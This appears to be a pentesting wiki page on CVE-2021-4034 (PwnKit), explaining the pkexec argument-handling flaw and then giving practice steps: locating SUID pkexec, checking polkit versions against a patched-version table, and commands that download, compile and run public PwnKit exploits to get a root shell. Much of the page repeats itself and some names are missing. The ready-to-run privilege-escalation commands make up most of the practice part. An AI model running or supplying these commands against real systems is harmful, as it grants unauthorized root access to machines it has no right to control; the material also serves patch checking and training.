PwnKit

CVE-2021-4034

Theory

CVE-2021-4034 (pwnkit) was discovered by researchers at . The vulnerability has existed in every version of the "Policy Toolkit" (or, Polkit) package since it was first released in 2009 and allows any unprivileged attacker to easily obtain full administrative access over any Linux machine with the Polkit package installed. Polkit is installed by default on most distributions of Linux, making this vulnerability extremely widespread. The Pwnkit vulnerability exists in the pkexec utility. The pkexec command is used by authorized users to execute commands at elevated privileges (like using sudo).

Pkexec attempts to parse any command-line arguments that we pass it using a for-loop, starting at the index 1 to offset the name of the program and obtain the first real argument. The name of the program is irrelevant to argument parsing, so the indexing is simply offset to ignore it. But if we don't provide any arguments, the index is permanently set to 1. This becomes a problem later when pkexec attempts to write to the value of the argument at index n. As there are no command-line arguments, there is no argument at index n — instead the program overwrites the next thing in memory, which just so happens to be the first value in the list of environment variables when the program is called using a C function called execve(). In other words, by passing pkexec a null list of arguments, we can force it to overwrite an environment variable instead! -

Practice

To make the PwnKit exploit working. The SUID bit on the pkexec binary must be set

$ find / -type f -name *pkexec* -perm -4000 2>/dev/null
/usr/bin/pkexec

Check if the policykit package is vulnerable

#Debian/Ubuntu
apt list --installed | grep -i polkit

#RHEL/CentOs/Fedora
rpm -qa | grep -i polkit

#SUE
zypper search -i polkit

#Oracle Linux
pkginfo | grep -i polkit

Here is a summary table of patched versions by OS. Earlier versions are vulnerable

OS Version

Patched version

CentOS 7

polkit-0.112-26.el7_9.1

CentOS 8

polkit-0.115-13.el8_5.1

Debian 9

policykit-1_0.105-18+deb9u2

Debian 10

policykit-1_0.105-25+deb10u1

Debian 11

policykit-1_0.105-31+deb11u1

Oracle Linux 6

polkit-0.96-11.0.1.el6_10.1

Oracle Linux 7

polkit-0.112-26.0.1.el7_9.1

Oracle Linux 8

polkit-0.115-13.0.1.el8_5.1

SUSE Linux Enterprise Server 12

polkit-debugsource-0.113-5.24.1

SUSE Linux Enterprise Server 15 LTSS et SP1

polkit-debugsource-0.116-3.6.1

SUSE Linux Enterprise Server 15 SP2

polkit-debugsource-0.114-3.15.1

Red Hat 6

polkit-0.96-11.el6_10.2

Red Hat 7

polkit-0.112-26.el7_9.1

Red Hat 8

polkit-0.115-13.el8_5.1

Ubuntu 18.04

policykit-1-0.105-20ubuntu0.18.04.6

Ubuntu 20.04

policykit-1-0.105-26ubuntu1.2

Ubuntu 21.10

policykit-1-0.105-31ubuntu0.1

Fedora 34

polkit-0.117-3.fc34.2

Fedora 35

polkit-0.120-1.fc35.1

Anolis OS 7

polkit-0.112-26.an7.1

Anolis OS 8

polkit-0.115-13.an8_5.1

Alibaba Cloud Linux 2

polkit-0.112-26.3.al7.1

Alibaba Cloud Linux 3

polkit-0.115-13.al8.1

#Run the exploit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit        # interactive shell
./PwnKit 'id'   # single command

# Or you may want to compile it by yourself
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc

Ressource

Last updated 1 year ago

Was this helpful?

Theory

Practice

To make the PwnKit exploit working. The SUID bit on the pkexec binary must be set

$ find / -type f -name *pkexec* -perm -4000 2>/dev/null
/usr/bin/pkexec

Check if the policykit package is vulnerable

#Debian/Ubuntu
apt list --installed | grep -i polkit

#RHEL/CentOs/Fedora
rpm -qa | grep -i polkit

#SUE
zypper search -i polkit

#Oracle Linux
pkginfo | grep -i polkit

Here is a summary table of patched versions by OS. Earlier versions are vulnerable

OS Version

Patched version

CentOS 7

polkit-0.112-26.el7_9.1

CentOS 8

polkit-0.115-13.el8_5.1

Debian 9

policykit-1_0.105-18+deb9u2

Debian 10

policykit-1_0.105-25+deb10u1

Debian 11

policykit-1_0.105-31+deb11u1

Oracle Linux 6

polkit-0.96-11.0.1.el6_10.1

Oracle Linux 7

polkit-0.112-26.0.1.el7_9.1

Oracle Linux 8

polkit-0.115-13.0.1.el8_5.1

SUSE Linux Enterprise Server 12

polkit-debugsource-0.113-5.24.1

SUSE Linux Enterprise Server 15 LTSS et SP1

polkit-debugsource-0.116-3.6.1

SUSE Linux Enterprise Server 15 SP2

polkit-debugsource-0.114-3.15.1

Red Hat 6

polkit-0.96-11.el6_10.2

Red Hat 7

polkit-0.112-26.el7_9.1

Red Hat 8

polkit-0.115-13.el8_5.1

Ubuntu 18.04

policykit-1-0.105-20ubuntu0.18.04.6

Ubuntu 20.04

policykit-1-0.105-26ubuntu1.2

Ubuntu 21.10

policykit-1-0.105-31ubuntu0.1

Fedora 34

polkit-0.117-3.fc34.2

Fedora 35

polkit-0.120-1.fc35.1

Anolis OS 7

polkit-0.112-26.an7.1

Anolis OS 8

polkit-0.115-13.an8_5.1

Alibaba Cloud Linux 2

polkit-0.112-26.3.al7.1

Alibaba Cloud Linux 3

polkit-0.115-13.al8.1

We can use made by ly4k. It should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

#Run the exploit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit        # interactive shell
./PwnKit 'id'   # single command

# Or you may want to compile it by yourself
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

Alternativly, we can use made by arthepsy

gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc